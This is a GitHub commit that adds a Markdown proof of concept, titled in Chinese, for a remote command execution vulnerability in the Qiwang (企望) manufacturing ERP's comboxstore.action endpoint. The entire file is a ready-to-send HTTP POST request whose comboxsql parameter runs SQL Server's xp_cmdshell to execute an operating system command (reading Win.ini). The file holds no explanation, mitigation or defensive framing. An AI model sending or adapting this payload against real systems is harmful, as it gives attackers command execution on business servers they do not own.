Create 企望制造 ERP comboxstore.action 远程命令执行漏洞.md

This commit is contained in:
wy876 2023-08-20 09:33:11 +08:00 committed by GitHub
parent be79969d3f
commit 95aa39046e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,9 @@
## 企望制造 ERP comboxstore.action 远程命令执行漏洞
```
POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: xxx.xxx.xxx.xxx
comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
```